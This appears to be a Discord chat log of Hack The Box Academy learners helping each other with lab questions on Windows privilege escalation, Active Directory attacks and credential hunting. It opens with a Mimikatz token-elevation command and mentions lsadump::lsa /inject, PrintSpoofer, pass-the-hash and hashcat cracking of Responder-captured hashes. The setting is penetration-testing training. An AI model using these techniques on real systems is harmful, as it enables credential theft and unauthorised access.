.\mimikatz.exe "privilege::debug" "token::elevate" "<command here>" "exit"

Ah okay I'm gonna write this down thanks I appreciate it

Hello, I have a question about lateral movement.
In a pentest, the pentester accessed host-c from host-a based on credentials collected from host-b , is that a lateral movement from host-a to host-c or from host-b to host-c?

@graceful forge check out #welcome and #rules . I do not know anyone that can help you evolve in infosec, only yourself. Read the rules, and please abide by them.

why do I have to use git clone to download a .exe for PrintSpoofer?! I downloaded the zip and there was no exe. Now I used git clone based on a writeup using the tool and git clone spits out a file with an exe. I don't get it.

Oh, nevermind, they're in releases

I don't understand why the PrintSpoofer was the key to the SQL01 machine, how was I supposed to know that without getting a hint online?!

just fucking around and finding out ¯_(ツ)_/¯

It's discouraging, would have taken me forever to figure that out

likely something in the enumeration phase would have revealed it

bro it says it right there, seimpersonate

It's not the end of the world, but I'm worried about the exam

you even sent a screenshot

There's no writeup or discord on the exam. I'm just hoping that it's not as specific because I feel like I could be searching for days for some small detail.

my brother in christ

It's likely talked about in the module that SeImpersonate = try printspoofer

does juicypotato also work?

I went back and finally found something mentioning printspoofer, but it was among two other tools

yes

None of them were covered in the module, just mentioned

🤦‍♂️

probably mentioned in context to priveleges

Stuck on
WINDOWS PRIVILEGE ESCALATION : Credential Hunting
Question:
Search the file system for a file containing a password. Submit the password as your answer.

Tried this [2] as per Hint, but nothing..!
Can anyone give a nudge..

i mean the password might not be "Password"

then learn how to use

it cannot be more obvious

not even 'password' ???

🥲

it just says containing A password

doesn't mean that it contains the text "password"

My problem is I had to resort to a writeup specific to a hackthebox machine, and couldn't just figure it out using the documentation for the tool itself.

The docs for the tool didn't even cover using it in the context of an SQL shell

As per section
When i ran this with strating directory C, it gave me a lot of file that contains the word 'password' and found few but non of them was the answer
so asking

I was able to transfer the files no problem obviously, but the workflow just wasn't there without using extra help.

Just a bummer I had to resort to that.

"We find that we have SeImpersonatePrivelege, which can be leveraged in combination with a tool such as JuicyPotato, PrintSpoofer, or RoguePotato"

literally in the text

I know, there just wasn't anything else on how to use PrintSpoofer

At least in the academy module

Figured it out though, I guess that's what matters

yep because the search looks for specifically 'password' string

Ok 😁
hint me the string

sidenote: love your use of drawings to convey how you feel

idk the string lmao i haven't done it

but likely you're gonna wanna just first try manually looking around for files

Thank kooo...!!!

try just pass

also use powershell, findstr sucks

Get-ChildItem? I think is the thing, but i think powershell has grep aliased to it

and selectstring

i love that Microsoft was just like "Let's alias all these linux commands to Powershell native commands by default"

pretty much yeah

also gotta love the CamelCasing

isn't that: camelCase

I'm actually a fan of C naming conventions, looks better compared to python's snake case

Nope CamelCase separates words by the First Letter Of Each Word Capitalized

https://en.wikipedia.org/wiki/Camel_case you're thinking of title case

https://developer.mozilla.org/en-US/docs/Glossary/Kebab_case

and now i know of kebab-case

also according to wiki, the first word can start either lowercase or capitalized, GG

for programming naming convention it's usually always camelCase

Fine I guess I was referring to Pascal Case

🤓

What module/section went over "lsadump::lsa" command in mimkatz?

likely password attacks

"lsadump::lsa /inject" actually

I have the modules saved as .md files and I have checked AD, Password, and Common Services, can't seem to find it

Is there a similar command that's covered?

It's to get an admin NTLM hash.

I guess at this point what I need to ask is, what other tool would have provided the same output, since lsadump::lsa /inject isn't covered explicitly in any module?

Is this similar to an lsass dump in powershell and then analysis with pypykatz?!

At a glance that's what it seems like.

Has anyone done the Windows Attack & Defense module?

@fathom pendant @next bronze
Solved after thinking out of the box..!

Yes findstr sometimes don't show files..!!!

Trying to use a pass the hash on AD Skills Assessment 2 but getting an error

why is powerview throwing this error?

wrong hash

use NT hash only

hello guys anyone is doing ad module? i just want to check because i cannot ping, i want to check if there is something wrong, please can anyone helps me?

sometimes machines can't be pinged; but in any case - are you connected to the vpn? do you only have 1 tunX interface (tun0)

in-general though you should ask technical support questions to support (green bubble on the website)

i have tun0 but i cant reach the subnet they gave me 172.x.x.x/23
i cant do fping also

ah

well; that's because that's an internal network

you need to pivot through the spawned target to get to it

the vpn only grants you access to the 10.129.x.x network

but i am on the machine they gave me at start i need to pviot from there?

wdym "at start"

do you mean the spawned target system "10.129.x.x"?

i did run the spawn machine 10.10.x.x

10.10.x.x is generally your tun0 iip

i'm talking about the big green button "Click Here To Spawn Target"

not "Start Instance"

"Start Instance" starts the in-browser pwnbox

sorry for confusing things but i have just returned back to that module after stopping for long time some of them i have finished i am just recaping from 0

this is what you click to spawn a target system to pivot through

now i am in the section initial enumeration of the domain they put me screenshots and commands and start machine not the target its the machine that i use, there i cant use those commands right? i need to spawn target

hi guys, anyone knows why everytime i try to ssh it gets stuck like before password input? it never finish "loading", ive tried to restart IP, ive changed VPN server and still the same

when they say "start the machine" they mean the target machine

message support on the site

okay

start instance*
sorry this is the correct word

this button spawns the in-browser pwnbox

which is NOT the target system, and does NOT have access to the internal target network

so maybe this is just introduction here in this section initial enumeration of the domain

Thank u so much @fathom pendant ur amazing
i will check it out

i'm now confused as to wtf you're on

do NOT run the pwnbox if you're using your own vm and vpn

running both the pwnbox and your own vm/vpn will cause issues

the ONLY button you need is the "Click here to spawn the target system!" which gives you a foothold to start with

i was just double checking if i have any configuration wrong on my kali box thats why i run the instance

thank u so much

it's not an issue with your kali box

it's literally the fact that you CANNOT access the 172.16.x.x network. period

without first connecting/setting up a pivot through the foothold target

i understand thank u so much

i believe this target/foothold is a linux machine

i will check it out and let u know thank u

Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?
I know I can do it with bloodhound but I wanna know is there any other way to do it

HI I'm doing the IMAP/POP3 footprinting module, I'm quite stuck trying to find the admin email address. I connected via openssl to the server and tryed to LIST the content of INBOX or the others mailbox but without any luck. May I ask you for an advince or point e in the right direction?

if you read the email you can see who sent the mail

but first you'd need to log in as a user

you can't list mailboxes without first logging in

that's was my idea and I did the login, at least i guess 😅 . I'll try to re-do the procedure thank you

you can read dacl

also with imap; you NEED to have a prefix

{something here} <Command> <args>

On Windows Priv Esc -> Weak Permissions:
was able to elevate privilege and got to the flag by signing out/in. However could only reach flag in GUI not over CMD (gor permissions denied). Any idea how one would reach the flag in cmd?

run cmd as admin?

the module or section of ad enumeration

tried using runas for a new session?

I don't think it's covered, you'll need to do your own research https://www.thehacker.recipes/ad/movement/dacl

did you also use bloodhound for this task?

Bloodhound would be able to show you that information

yep, don't remember what I used though, it's been a while

lol

thought I did, what rookie mistake

Thx MarcieLee and olliz0r

Hello

Understanding Log Sources & Investigating with Splunk
Intrusion Detection With Splunk (Real-world Scenario)

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe

actually i am struggle here by this question ,someone can dm me for gave me some hint ?

The question says that you should filter for the clr.dll.
Think about which property must also be fulfilled for the call to be suspicious.

hi performance problems again ?

inthe academy

Hackthebox is pretty crazy, for me it's way more interesting as tryhackme

hack the box is can be starting position for beginners but tryhackme is like the easier way to start while htb is harder if you just start in cybersecurity

You need to challenge yourself sometimes to learn something better

you also should not throw yourself in the deep end

Stuck on:
WINDOWS PRIVILEGE ESCALATION: Other Files
Question:
Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system.

Tired to find in the way but this is not the answer..!!
Can anyone show me the correct way to solve this?

It's not that too much hard for new guys that they will be so bad with it

I mean, i tried it and not that hard by far

ikr

which rank are you in the labs

I mean I just started yesterday

in quotes putt exactly the password you sumbit

like tell me

not htb

sorry didn't got you

like this
"apple"

yeah

put in quotes the password and put it here in discord

so i can see if you make any mistakes

Please don't advise such stuff

wdym

that's clearly the password

its prob problem with what he inputs in the website

It definitely is a password, but not the expected one

fr?

I used both ' and " but not accepting the answer..

Ohh man.. !

it's not the right password

i caused such big confusion to everyone here just trying to help

i wanna apologize for

no problem
it happens..!!

out there 2 people telling me its not the right password, so ig u gotta find the right one

I gotcha..!!

mb lmao didn't scroll down

SOLVED..!!!

Module: Information Gathering - Web Edition
Section Active Infrastructure Identification
Question: Which CMS is used on app.inlanefreight.local? (Format: word)
the solution i am trying to use is
whatweb -a3 app.inlanefreight.local or
whatweb -a3 http://app.inlanefreight.local
getting Error Opening:....
please guide me if i am doing something wrong

i want to help this server trive

give me mod and watch

what does whatweb do ?

Whatweb recognizes web technologies, including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices

can this url point to a ip ?

i tired but getting the same result

and di you do manual inspection first ?

tried with curl but no luck

can you ping it ?

by ip yes, with name no

have you added it to your /etc/hosts?

no

that might be an idea

as well as any subdomains you have

yes

a computer is "dumb" you have to tell him what you want

its almost as if its brainless

tbh thats basic knowledge

yk...

😄

does anyone in here have problems with rdp too ?

Module : Active & Directory Enumeration/Attacks
Section : LLMNR Poisoning with Linux
Question : Unable to crack the hash using the specific command
Command used : hashcat -m 5600 hash.txt /usr/share/wordlist/rockyou.txt

hash[.]txt file content

copy pasted it in the Responder Result

from the 3 orange lines in the hashcat output I'd say it thinks it has 4 hashes

make sure you remove the newlines at the end of each line

I'll try thanks

This is the result by removing the newlines, my copy paste is weird lol might be skill issue. Pasted it using nano

used --show and I found the password, but the output from the module is different from what I did

is the output supposed to be the same? sometimes they use a slightly different environment to test you

Not really sure about that but I just did the same command in the module tho. But I was expecting this one, not really a big problem as long as I have the result.

that one looks to be for the user forend, yours is for backupagent

results could differ depending on the user's environment?

I just think you were in a different lab than the explanation in the section. You were supposed to intercept backupagent, they showed you how to intercept another user

Just figured that i need to use a Windows Exploit on a Machine, used bevore another Exploit to get the Salt+Key from it (sadly it doesnt seem to be usefull atm)^^

Can anyone help me with the command injection module?

hello guys what is the problem in file upload module need help

What problem ?

Stuck on
WINDOWS PRIVILEGE ESCALATION: Further Credential Theft
Question:
Using the techniques covered in this section, retrieve the sa password for the SQL01.inlanefreight.local user account.

I have tried this but seems some thing going wrong..!
This password is not accepted..

Really getting tired of this cred hunting

isnt the password hashed?